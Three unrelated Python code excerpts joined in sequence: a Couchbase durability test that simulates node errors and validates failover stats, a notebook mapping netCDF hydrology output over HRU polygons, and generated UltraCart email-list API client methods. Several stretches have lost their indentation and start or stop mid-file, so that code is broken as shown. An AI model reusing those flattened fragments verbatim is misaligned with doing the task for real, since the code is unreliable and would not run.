vb_info_info["afterCrud"] = dict()
self.log.info("Selecting nodes to simulate error condition")
target_nodes = DurabilityHelper.getTargetNodes(self.cluster,
self.nodes_init,
self.num_nodes_affected)
self.log.info("Will simulate error condition on %s" % target_nodes)
for node in target_nodes:
shell_conn[node.ip] = RemoteMachineShellConnection(node)
cbstat_obj[node.ip] = Cbstats(shell_conn[node.ip])
active_vbs_in_target_nodes += cbstat_obj[node.ip].vbucket_list(
self.bucket.name,
"active")
vb_info_info["init"][node.ip] = cbstat_obj[node.ip].vbucket_seqno(
self.bucket.name)
failover_info["init"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Remove active vbuckets from doc_loading to avoid errors
load_spec = dict()
load_spec["doc_crud"] = dict()
load_spec["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
load_spec["doc_crud"][
MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
load_spec["target_vbuckets"] = list(set(range(0, 1024))
^ set(active_vbs_in_target_nodes))
self.log.info("Perform 'create', 'update', 'delete' mutations")
doc_loading_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
load_spec,
mutation_num=1,
async_load=True)
self.sleep(5, "Wait for doc loaders to start loading data")
for node in target_nodes:
# Create shell_connections
shell_conn[node.ip] = RemoteMachineShellConnection(node)
# Perform specified action
error_sim[node.ip] = CouchbaseError(self.log,
shell_conn[node.ip])
error_sim[node.ip].create(self.simulate_error,
bucket_name=self.bucket.name)
# Perform new scope/collection creation during doc ops in parallel
self.__perform_collection_crud()
# Wait for document_loader tasks to complete
self.task_manager.get_task_result(doc_loading_task)
self.bucket_util.validate_doc_loading_results(doc_loading_task)
if doc_loading_task.result is False:
self.log_failure("Doc CRUDs failed with process crash")
if self.simulate_error \
not in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
# Revert the induced error condition
for node in target_nodes:
error_sim[node.ip].revert(self.simulate_error,
bucket_name=self.bucket.name)
# Disconnect the shell connection
shell_conn[node.ip].disconnect()
self.sleep(10, "Wait for node recovery to complete")
# In case of error with Ephemeral bucket, need to rebalance
# to make sure data is redistributed properly
if self.bucket_type == Bucket.Type.EPHEMERAL:
retry_num = 0
result = None
while retry_num != 2:
result = self.task.rebalance(
self.servers[0:self.nodes_init],
[], [])
if result:
break
retry_num += 1
self.sleep(10, "Wait before retrying rebalance")
self.assertTrue(result, "Rebalance failed")
# Fetch latest failover stats and validate the values are updated
self.log.info("Validating failover and seqno cbstats")
for node in target_nodes:
vb_info_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].vbucket_seqno(self.bucket.name)
failover_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Failover stat validation
if self.simulate_error == CouchbaseError.KILL_MEMCACHED:
val = failover_info["init"][node.ip] \
!= failover_info["afterCrud"][node.ip]
else:
if self.simulate_error != CouchbaseError.STOP_MEMCACHED \
and self.bucket_type == Bucket.Type.EPHEMERAL:
val = failover_info["init"][node.ip] \
!= failover_info["afterCrud"][node.ip]
else:
val = failover_info["init"][node.ip] \
== failover_info["afterCrud"][node.ip]
error_msg = "Failover stats mismatch after error condition:" \
" %s != %s" \
% (failover_info["init"][node.ip],
failover_info["afterCrud"][node.ip])
self.assertTrue(val, msg=error_msg)
# Seq_no validation (High level)
val = \
vb_info_info["init"][node.ip] \
!= vb_info_info["afterCrud"][node.ip]
self.assertTrue(val, msg="vbucket seq_no not updated after CRUDs")
# Doc count validation
self.validate_test_failure()
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
def test_non_overlapping_similar_crud(self):
"""
Test to run non-overlapping durability cruds on single bucket
and make sure all CRUD operation succeeds
1. Run single task_1 with durability operation
2. Create parallel task to run either SyncWrite / Non-SyncWrite
operation based on the config param and run that over the docs
such that it will not overlap with other tasks
3. Make sure all CRUDs succeeded without any unexpected exceptions
"""
# Stat validation reference variables
verification_dict = dict()
verification_dict["ops_create"] = 0
verification_dict["ops_update"] = 0
verification_dict["ops_delete"] = 0
verification_dict["rollback_item_count"] = 0
verification_dict["sync_write_aborted_count"] = 0
verification_dict["sync_write_committed_count"] = 0
for _, scope in self.bucket.scopes.items():
for _, collection in scope.collections.items():
verification_dict["ops_create"] += collection.num_items
if self.durability_level in self.supported_d_levels:
verification_dict["sync_write_committed_count"] \
+= collection.num_items
failed = self.durability_helper.verify_vbucket_details_stats(
self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
vbuckets=self.cluster.vbuckets,
expected_val=verification_dict)
if failed:
self.fail("Cbstat vbucket-details verification failed")
doc_ops = self.input.param("doc_ops", "create")
# Reset initial doc_loading params to NO_OPS
doc_load_template = \
self.bucket_util.get_crud_template_from_package("initial_load")
doc_load_template[MetaCrudParams.DURABILITY_LEVEL] = ""
doc_load_template[MetaCrudParams.COLLECTIONS_CONSIDERED_FOR_CRUD] = 3
doc_load_template["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 0
doc_load_template["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
# | |
<reponame>pnorton-usgs/notebooks
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit]
# language: python
# name: conda-env-bandit-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
# %matplotlib inline
from __future__ import (absolute_import, division, print_function)
from future.utils import iteritems
import netCDF4 as cf
import pandas as pd
from datetime import datetime
from calendar import monthrange
from collections import namedtuple
import matplotlib as mpl
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize, LogNorm, PowerNorm
# mpl.use('Agg')
# from matplotlib.backends.backend_pdf import PdfPages
from mpl_toolkits.axes_grid1 import make_axes_locatable
# see https://github.com/matplotlib/basemap/issues/354
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
import os
import pyproj as prj
from osgeo import ogr
import sys
# %%
# Configuration cell: choose which netCDF file to visualize.  The commented
# work_dir/filename pairs below are previously-used dataset locations kept
# for quick switching between runs.
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/fortran/prms6/tests/red_river_of_the_south/output'
# filename = '{}/nhru_out_meanmonthly.nc'.format(work_dir)
# work_dir = '/Users/pnorton/tmp'
# filename = '{}/BCCA_0-125deg_tasmin_day_ACCESS1-0_historical_r1i1p1.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/bandit/jobs/20190425_red_river'
# filename = '{}/daymet_v3_cbh.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/daymet_v3_1980-01-01_2016-12-31/tmp'
# filename = '{}/daymet_v3_cbh_tmin_20150101-20151231.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/fortran/converters'
# filename = '{}/tmaxf.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/NHM_output/netcdf'
# filename = '{}/dprst_stor_hru.nc'.format(work_dir)
work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/conus/output'
filename = '{}/summary_daily.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks'
# filename = '{}/test1.nc'.format(work_dir)
# Flag shared by the plotting cells below: True means the figure, basemap and
# patch collection still need to be built; the plot cells flip it to False
# and afterwards only update polygon facecolors in place.
first_time = True
# %%
# Open the netCDF file read-only ('cf' is the netCDF4 module alias from the
# imports cell) and locate the record (time) dimension.
fhdl = cf.Dataset(filename, 'r')
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Get the size of the unlimited record dimension
dimensions = fhdl.dimensions
# Lightweight record describing the chosen record dimension (name + length)
recdims = namedtuple('recdim', 'name, size')
print("======= Dimensions =======")
for xx, yy in dimensions.items():
    if yy.isunlimited():
        print('%s: %d (unlimited)' % (xx, len(yy)))
        recdim = recdims(name=xx, size=len(yy))
    else:
        if xx in ['time']:
            # Found a limited record dimension
            # (a fixed-size 'time' dimension is still used as the record dim)
            print('Fixed dimension, {}'.format(xx))
            recdim = recdims(name=xx, size=len(yy))
        print('%s: %d' % (xx, len(yy)))
# NOTE(review): recdim stays undefined if the file has neither an unlimited
# dimension nor a 'time' dimension — later cells would then raise NameError.
# %%
# print("======= Variables =======")
# for xx in fhdl.variables:
# print(xx)
# %%
# Units of the record (time) dimension, e.g. 'days since 1980-01-01'
d0units = fhdl.variables[recdim.name].units
print(d0units)
try:
    d0calendar = fhdl.variables[recdim.name].calendar
    print(d0calendar)
except AttributeError:
    # netCDF4 raises AttributeError (not KeyError) when a variable attribute
    # is missing, so this is the exception that actually signals "no calendar
    # attribute"; fall back to the CF default calendar in that case.
    print('calendar attribute missing, assuming standard calendar')
    d0calendar = 'standard'
# %%
# Variable to visualize (also used as the colorbar label) and the time index
cblabel = 'pkwater_equiv'
time_idx = 100
# Read the time values into a list
# (num2date converts the raw time offsets into datetime-like objects)
timelist = cf.num2date(fhdl.variables[recdim.name][:], units=d0units, calendar=d0calendar)
# print(timelist)
# Create dataframe of the output variable
data_var = fhdl.variables[cblabel]
# Set the min and max values allowed - right now we just take the min and max of the dataframe values
# NOTE(review): this scans the whole variable (all time steps), which can be
# slow for large files; min_val/max_val/val_rng are not referenced by the
# later cells shown here.
min_val = np.min(data_var)
max_val = np.max(data_var)
val_rng = max_val - min_val
# var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# # Create dataframe of nhm_id
# # nhm_id_var = fhdl.variables['hru']
# nhm_id_var = fhdl.variables['nhm_id']
# # nhm_id_var = fhdl.variables['hru_feature_id']
# nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# # Create a DataFrame of the output variable
# # df = var_df.merge(nhm_df, left_index=True, right_index=True)
# # df.set_index('nhru', inplace=True)
# df = var_df.join(nhm_df).set_index('nhru').sort_index()
# print(df.head())
# print(df.info())
# %%
# Display the timestamp for the chosen index (notebook cell output)
timelist[time_idx].isoformat()
# %%
# Create the colormap
# cmap = 'BrBG' #'GnBu_r' # for snow
# cmap = 'GnBu_r'
cmap = 'jet'
# create the colormap if a list of names is given, otherwise
# use the given colormap
lscm = mpl.colors.LinearSegmentedColormap
if isinstance(cmap,(list,tuple)):
    # A list/tuple of color names becomes a custom segmented colormap
    cmap = lscm.from_list('mycm', cmap)
else:
    # Otherwise treat cmap as the name of a built-in matplotlib colormap
    cmap = plt.get_cmap(cmap)
missing_color = '#ff00cb' # pink/magenta
# NOTE(review): missing_color is defined but the plotting cells below paint
# missing HRUs via .fillna(-99) through the colormap instead — confirm intent.
# ### Read in parameter file and create dataframe of selected parameter from the NHM parameter database
# #### <I>Min and max values for range are currently hardcoded or selected from the range of parameter values. <br>It would be better to read accepted range information from an xml file for the parameters.</I>
# TODO: Lookup dimensions for given parameter use that to select segment IDs or HRU IDs
# for the index column. If parameter is 2D (e.g. nhru x nmonths) then use the
# second dimension to loop and create one plot/map for each value of the second
# dimension.
# # Set the min and max values allowed - right now we just take the min and max of the dataframe values
# min_val = df.min().min()
# # max_val = 10.
# max_val = df.max().max()
# val_rng = max_val - min_val
# ### Get extent information from the national HRUs shapefile
# Need two shapefiles 1) in projected coordinates, 2) in geographic coordinates
# If gdal is installed can create geographic coordinates from projected with:
# ogr2ogr -t_srs epsg:4326 output_wgs84.shp input.shp
# shpfile = '/Users/pnorton/Projects/National_Hydrology_Model/extraction_requests/20180307_red_river/GIS/HRU_subset_nad83.shp'
# shpfile_extent = '/Users/pnorton/Projects/National_Hydrology_Model/extraction_requests/20180307_red_river/GIS/HRU_subset_usaea.shp'
shpfile = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks/GIS/all_nhru_simple/nhruNationalIdentifier.shp'
shpfile_extent = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks/GIS/all_nhru_simple_usaea/nhruNationalIdentifier.shp'
# Name of attribute to use. Change to match the name of the HRU id attribute in the shapefile
shape_key='hru_id_nat'
# Use gdal/ogr to get the extent information
# Shapefile can be in projected coordinates
# Driver can be: OpenFileGDB or ESRI Shapefile
inDriver = ogr.GetDriverByName("ESRI Shapefile")
inDataSource = inDriver.Open(shpfile_extent, 0)
inLayer = inDataSource.GetLayer()
# OGR Layer.GetExtent() returns (minX, maxX, minY, maxY), which matches the
# (west, east, south, north) unpacking below
extent = inLayer.GetExtent()
# Get the spatial reference information from the shapefile
spatial_ref = inLayer.GetSpatialRef()
# Create transformation object using projection information from the shapefile
xform = prj.Proj(spatial_ref.ExportToProj4())
west, east, south, north = extent
pad = 100000. # amount to pad the extent values with (in meters)
# Padding is currently disabled; uncomment to expand the map extent
#east += pad
#west -= pad
#south -= pad
#north += pad
# Inverse-project the extent corners from projected coordinates to lon/lat
LL_lon, LL_lat = xform(west, south, inverse=True)
UR_lon, UR_lat = xform(east, north, inverse=True)
print('\tExtent: ({0:f}, {1:f}, {2:f}, {3:f})'.format(west, east, south, north))
print('\tExtent: (LL: [{}, {}], UR: [{}, {}])'.format(LL_lon, LL_lat, UR_lon, UR_lat))
# Matplotlib basemap requires the map center (lon_0, lat_0) be in decimal degrees
# and yet the corners of the extent can be in projected coordinates
cen_lon, cen_lat = xform((east+west)/2, (south+north)/2, inverse=True)
# %%
# Build a one-column DataFrame of the selected variable at a single time
# step, indexed by national HRU id (nhm_id).
time_idx = 75
var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# Create dataframe of nhm_id
# nhm_id_var = fhdl.variables['hru']
nhm_id_var = fhdl.variables['nhm_id']
# nhm_id_var = fhdl.variables['hru_feature_id']
nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# Create a DataFrame of the output variable
# df = var_df.merge(nhm_df, left_index=True, right_index=True)
# df.set_index('nhru', inplace=True)
df = var_df.join(nhm_df).set_index('nhru').sort_index()
print(df.head())
print(df.info())
# %%
# %%
# first_time = True
# Render the selected time step on a national HRU map.  On the first run the
# figure and basemap are built; on later runs only the polygon facecolors of
# the existing collection are updated in place (much faster).
if df.shape[1] > 1:
    print('Currently unable to handle 2D parameters')
else:
    if first_time:
        # Create the map figure
        fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
        # ax = axes.flatten()
        ax = axes
        # ax = plt.gca()
        # Load the basemap
        m = Basemap(width=east-west, height=north-south, resolution='c',
                    projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
        # draw parallels.
        m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
        # draw meridians
        m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
        m.drawmapboundary()
    # ------------------------------------------------------------------
    # Use basemap to read and draw the shapefile
    # Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
    # m.nhruDd contains the lines of the borders
    # m.nhruDd_info contains the info on the hru, like the name
    print('Read shapefile...')
    m.readshapefile(os.path.splitext(shpfile)[0], 'nhruDd', drawbounds=False)
    print('Create dataframe from shapefile')
    # One row per HRU polygon: the patch geometry plus its national HRU id
    df_poly = pd.DataFrame({'shapes': [Polygon(np.array(ss), closed=True) for ss in m.nhruDd],
                            'id': [aa[shape_key] for aa in m.nhruDd_info]})
    print('Create plotting dataframe')
    # Left-join keeps every polygon; HRUs missing from df get NaN values
    df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
    print('Patch Collection')
    pc = PatchCollection(df_plot.shapes, cmap=cmap, match_original=True, zorder=2)
    # Strongly non-linear normalization to emphasize low values
    norm = PowerNorm(gamma=0.05)
    # if first_time:
    #     print('mapping...')
    #     mapper = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
    #     mapper.set_array(df_plot[cblabel])
    #     plt.colorbar(mapper, shrink=0.4)
    if first_time:
        ax.add_collection(pc)
    if first_time:
        print('facecolor')
        # pc.set_array(df_plot[cblabel].fillna(-99).values)
        # NaN (missing) HRUs are painted as -99 through the colormap
        pc.set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
    else:
        ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
    plt.title('Variable: {}, Date: {}'.format(cblabel, timelist[time_idx].isoformat()))
    fig.canvas.draw()
    fig.canvas.flush_events()
    first_time = False
# plt.show()
# %%
# Second rendering cell: same idea as the cell above, but the expensive
# shapefile read / patch-collection build is kept inside the first_time
# branch and a colorbar is added on the first draw.
if df.shape[1] > 1:
    print('Currently unable to handle 2D parameters')
else:
    if first_time:
        # Create the map figure
        fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
        # ax = axes.flatten()
        ax = axes
        # ax = plt.gca()
        # Load the basemap
        m = Basemap(width=east-west, height=north-south, resolution='c',
                    projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
        # draw parallels.
        m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
        # draw meridians
        m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
        m.drawmapboundary()
        # ------------------------------------------------------------------
        # Use basemap to read and draw the shapefile
        # Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
        # m.nhruDd contains the lines of the borders
        # m.nhruDd_info contains the info on the hru, like the name
        print('Read shapefile...')
        m.readshapefile(os.path.splitext(shpfile)[0], 'nhruDd', drawbounds=False)
        print('Create dataframe from shapefile')
        df_poly = pd.DataFrame({'shapes': [Polygon(np.array(ss), closed=True) for ss in m.nhruDd],
                                'id': [aa[shape_key] for aa in m.nhruDd_info]})
        print('Patch Collection')
        pc = PatchCollection(df_poly.shapes, cmap=cmap, match_original=True, zorder=2)
        # Strongly non-linear normalization to emphasize low values
        norm = PowerNorm(gamma=0.05)
    print('Create plotting dataframe')
    # Left-join keeps every polygon; HRUs missing from df get NaN values
    df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
    if first_time:
        print('mapping...')
        mapper = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
        mapper.set_array(df_plot[cblabel])
        plt.colorbar(mapper, shrink=0.4)
    if first_time:
        ax.add_collection(pc)
    if first_time:
        print('facecolor')
        # pc.set_array(df_plot[cblabel].fillna(-99).values)
        # NaN (missing) HRUs are painted as -99 through the colormap
        pc.set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
    else:
        ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
    if first_time:
        fig.canvas.draw()
    plt.title('Variable: {}, Date: {}'.format(cblabel, timelist[time_idx].isoformat()))
    # Output a png
    # fig.savefig(outfile, dpi=250, bbox_inches='tight',debug=True)
    # fig.clf()
    # plt.close()
    first_time = False
# %%
# Re-render an earlier time step: rebuild df for time_idx=0 and update the
# facecolors of the existing figure in place (assumes the plot cells above
# have already run, so df_poly/norm/ax/fig exist).
time_idx = 0
var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# Create dataframe of nhm_id
# nhm_id_var = fhdl.variables['hru']
nhm_id_var = fhdl.variables['nhm_id']
# nhm_id_var = fhdl.variables['hru_feature_id']
nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# Create a DataFrame of the output variable
# df = var_df.merge(nhm_df, left_index=True, right_index=True)
# df.set_index('nhru', inplace=True)
df = var_df.join(nhm_df).set_index('nhru').sort_index()
print(df.head())
print(df.info())
df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
# NOTE(review): the figure title still shows the previous date — call
# plt.title(...) here too if the title should track time_idx.
fig.canvas.draw()
fig.canvas.flush_events()
# %%
if df.shape[1] > 1:
print('Currently unable to handle 2D parameters')
else:
# Create the map figure
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
# ax = axes.flatten()
ax = axes
# Load the basemap
m = Basemap(width=east-west, height=north-south, resolution='c',
projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
#m = Basemap(llcrnrlon=west, llcrnrlat=south, urcrnrlon=east, urcrnrlat=north, resolution='c',
#projection='laea', lat_0=(south+north)/2, lon_0=(east+west)/2, ax=ax)
# draw parallels.
m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
# draw meridians
m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
m.drawmapboundary()
# ------------------------------------------------------------------
# Use basemap to read and draw the shapefile
# Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
# m.nhruDd contains the lines of the borders
# m.nhruDd_info contains the info on the hru, like the | |
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_customers(storefront_oid, email_list_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_uuid: (required)
:param int page_number:
:param int page_size:
:return: EmailListCustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, **kwargs) # noqa: E501
else:
(data) = self.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, **kwargs) # noqa: E501
return data
    def get_email_list_customers_with_http_info(self, storefront_oid, email_list_uuid, **kwargs):  # noqa: E501
        """Get email list customers  # noqa: E501

        Transport-level companion of ``get_email_list_customers``: validates
        the arguments and issues
        GET /storefront/{storefront_oid}/email/lists/{email_list_uuid}/customers.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int storefront_oid: (required)
        :param str email_list_uuid: (required)
        :param int page_number:
        :param int page_size:
        :return: EmailListCustomersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Names accepted in **kwargs: the documented query parameters plus
        # the generic transport options understood by api_client.call_api()
        all_params = ['storefront_oid', 'email_list_uuid', 'page_number', 'page_size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshot exposes the positional args by name; validated
        # kwargs entries are folded in, unknown keywords raise TypeError
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_email_list_customers" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'storefront_oid' is set
        if ('storefront_oid' not in params or
                params['storefront_oid'] is None):
            raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_customers`")  # noqa: E501
        # verify the required parameter 'email_list_uuid' is set
        if ('email_list_uuid' not in params or
                params['email_list_uuid'] is None):
            raise ValueError("Missing the required parameter `email_list_uuid` when calling `get_email_list_customers`")  # noqa: E501
        collection_formats = {}
        # Substitutions for the {storefront_oid}/{email_list_uuid} path slots
        path_params = {}
        if 'storefront_oid' in params:
            path_params['storefront_oid'] = params['storefront_oid']  # noqa: E501
        if 'email_list_uuid' in params:
            path_params['email_list_uuid'] = params['email_list_uuid']  # noqa: E501
        # Optional pagination query parameters (camelCase on the wire)
        query_params = []
        if 'page_number' in params:
            query_params.append(('pageNumber', params['page_number']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request: no body is sent
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
        # Delegate the actual HTTP call (and optional async dispatch) to the
        # shared generated api_client
        return self.api_client.call_api(
            '/storefront/{storefront_oid}/email/lists/{email_list_uuid}/customers', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EmailListCustomersResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_email_list_segment_folder(self, storefront_oid, email_list_segment_folder_uuid, **kwargs): # noqa: E501
"""Get email campaign folder # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_segment_folder(storefront_oid, email_list_segment_folder_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_segment_folder_uuid: (required)
:return: EmailListSegmentFolderResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, **kwargs) # noqa: E501
else:
(data) = self.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, **kwargs) # noqa: E501
return data
    def get_email_list_segment_folder_with_http_info(self, storefront_oid, email_list_segment_folder_uuid, **kwargs):  # noqa: E501
        """Get email list segment folder  # noqa: E501

        (The generated summary said "email campaign folder"; this endpoint
        actually fetches an email *list segment* folder.)  Validates the
        arguments and issues
        GET /storefront/{storefront_oid}/email/list_segment_folders/{email_list_segment_folder_uuid}.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int storefront_oid: (required)
        :param str email_list_segment_folder_uuid: (required)
        :return: EmailListSegmentFolderResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Names accepted in **kwargs: only the generic transport options
        all_params = ['storefront_oid', 'email_list_segment_folder_uuid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshot exposes the positional args by name; validated
        # kwargs entries are folded in, unknown keywords raise TypeError
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_email_list_segment_folder" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'storefront_oid' is set
        if ('storefront_oid' not in params or
                params['storefront_oid'] is None):
            raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_segment_folder`")  # noqa: E501
        # verify the required parameter 'email_list_segment_folder_uuid' is set
        if ('email_list_segment_folder_uuid' not in params or
                params['email_list_segment_folder_uuid'] is None):
            raise ValueError("Missing the required parameter `email_list_segment_folder_uuid` when calling `get_email_list_segment_folder`")  # noqa: E501
        collection_formats = {}
        # Substitutions for the path template slots
        path_params = {}
        if 'storefront_oid' in params:
            path_params['storefront_oid'] = params['storefront_oid']  # noqa: E501
        if 'email_list_segment_folder_uuid' in params:
            path_params['email_list_segment_folder_uuid'] = params['email_list_segment_folder_uuid']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request: no body is sent
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
        # Delegate the actual HTTP call (and optional async dispatch) to the
        # shared generated api_client
        return self.api_client.call_api(
            '/storefront/{storefront_oid}/email/list_segment_folders/{email_list_segment_folder_uuid}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EmailListSegmentFolderResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_email_list_segment_folders(self, storefront_oid, **kwargs):  # noqa: E501
    """Get email campaign folders # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_email_list_segment_folders(storefront_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int storefront_oid: (required)
    :return: EmailListSegmentFoldersResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # In async mode the _with_http_info call hands back the request thread;
    # in sync mode it hands back the data. Either way we pass it through.
    result = self.get_email_list_segment_folders_with_http_info(storefront_oid, **kwargs)  # noqa: E501
    return result
def get_email_list_segment_folders_with_http_info(self, storefront_oid, **kwargs):  # noqa: E501
    """Get email campaign folders # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
